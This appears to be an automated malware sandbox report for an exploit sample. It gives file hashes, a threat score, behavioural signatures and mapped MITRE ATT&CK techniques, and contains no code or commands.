General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.15725.4211

  • Size

    33KB

  • Sample

    220816-jlyxfsebhm

  • MD5

    40d7c7dfe04afec62912d621675ea1c3

  • SHA1

    3e2bed02260873ebaac655fac95254793783a39e

  • SHA256

    6499e81154bb08f3687529904a6e749a51c6817f06b7d8aec130bed97e60ab6d

  • SHA512

    b032da98c72117d40091342e19561740f56aac62638c5e423c6c3aa37144fc2208feb1579ae783a5da4d6557f1a243727febbacb1e28be71a5bcf046082b36d8

Score
10/10

Malware Config

Targets

    • Target

      SecuriteInfo.com.Exploit.Siggen3.17232.15725.4211

    • Size

      33KB

    • MD5

      40d7c7dfe04afec62912d621675ea1c3

    • SHA1

      3e2bed02260873ebaac655fac95254793783a39e

    • SHA256

      6499e81154bb08f3687529904a6e749a51c6817f06b7d8aec130bed97e60ab6d

    • SHA512

      b032da98c72117d40091342e19561740f56aac62638c5e423c6c3aa37144fc2208feb1579ae783a5da4d6557f1a243727febbacb1e28be71a5bcf046082b36d8

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Tasks